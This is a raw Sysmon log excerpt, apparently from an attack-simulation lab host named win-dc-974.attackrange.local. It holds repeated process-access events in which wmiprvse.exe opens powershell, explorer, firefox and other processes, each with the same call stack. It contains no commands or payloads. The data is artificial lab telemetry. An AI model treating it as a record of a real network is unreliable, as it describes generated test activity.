16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 